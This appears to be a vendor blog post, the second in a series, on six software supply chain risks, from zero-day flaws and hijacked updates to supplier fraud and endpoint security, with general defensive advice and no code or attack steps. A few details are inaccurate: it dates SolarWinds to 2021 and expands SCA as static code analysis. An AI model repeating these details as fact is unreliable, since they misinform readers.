Software Supply Chain Security Risks, Part 2
In part one of our series on software supply chain security risk, we examined six of the top software supply chain risks, but unfortunately, there are others.
Code is where modern software development begins, and the supply chain makes up everything that touches that code during the software development lifecycle–from infrastructure to hardware to operating systems to cloud services. In other words, software supply chains are the lifeblood of most organizations.
But as the term suggests, the software supply chain is comprised of several parts from several sources. Here is a look at six more risks to consider when it comes to your software supply chain security risk posture.
Risk: Unknown or Zero-Day Vulnerabilities
Applications can become unintentionally vulnerable to malicious attacks like remote code execution and denial of service due to errors in the coding process. These can lead to security flaws that are known as zero-day vulnerabilities. The ‘zero’ refers to how long they have been known about as well as the fact that security teams have zero days to fix them in software that has been already deployed.
To flag and prevent zero-day vulnerabilities from resulting in attacks, each component and application must be tested. Tools such as static code analysis (SCA), vulnerability scanning, and dynamic code review can identify a good majority of them, but because the tools can generate thousands of results, organizations need researchers with expertise to interpret and prioritize the ones that are most significant.
A robust, Dynamic SBOM will also give teams the information they need on all of the software components used throughout the SDLC and keep the list updated as changes are made. You should also regularly patch all systems and keep them up to date.
Risk: Cyber Updates Hijacking
Software updates and upgrades are periodically downloaded, and the assumption is that they are coming from a trusted software developer. But as we discovered during the SolarWinds attack in 2021, sometimes they come from a malicious source, posing a software supply chain risk.
This doesn’t mean you should avoid applying software updates—but be aware of this risk and make sure you do your due diligence vetting the vendors whose tools and apps play a part in your software supply chain.
Risk: Supplier Fraud
Another risk is when cybercriminals pretend to be a known vendor and request a chance to their payment process. It can be a challenge to identify these threat actors because they typically use sophisticated social engineering techniques, such as phishing, AI-generated voicemails, and Deepfake video recordings.
Equally troubling is that legitimate third-party vendors can fall victim to these fraud tactics. This results in significant data risks to your organization. This generally happens when there are no strong security policies in place.
Risk: Poor Communication Among Supply Chain Partners
All the players in the supply chain—including procurement and enterprise risk management teams–must communicate and coordinate their efforts effectively. Often, this does not happen. Technology such as advanced analytics is needed to identify potential supply chain failure points. But technology alone cannot avert risk. Third parties need to work together to assess risk and put risk management control measures in place so that organizations can avoid costly disruptions.
Risk: Increased Access to Supply Chain Resources
With so many resources used during the SDLC process, software security incidents can not only occur but become more serious. Access to cloud resources, developer tools, and repositories should be tightly controlled. This is where organizations can benefit from adopting the concept of least privilege throughout the supply chain to ensure that people only have the minimum access required for every component during the software development process.
Risk: A Lack of Endpoint Security
Connected endpoints are also a key part of the software supply chain that can introduce risk, especially as remote work has grown and the number of devices connected to networks is steadily increasing. Common approaches, such as virtual private networks and virtual desktops are not adequate on their own to protect organizations and mitigate threats.
Organizations should implement monitoring practices with full disclosure to their employees. They should also harden the security of all connected devices and sensitive data to reduce the attack surface.
Security teams can also proactively deploy tools such as encryption, data loss protection, advanced endpoint detection and response, and antivirus scanners. And of course, they should conduct regular security training for all employees.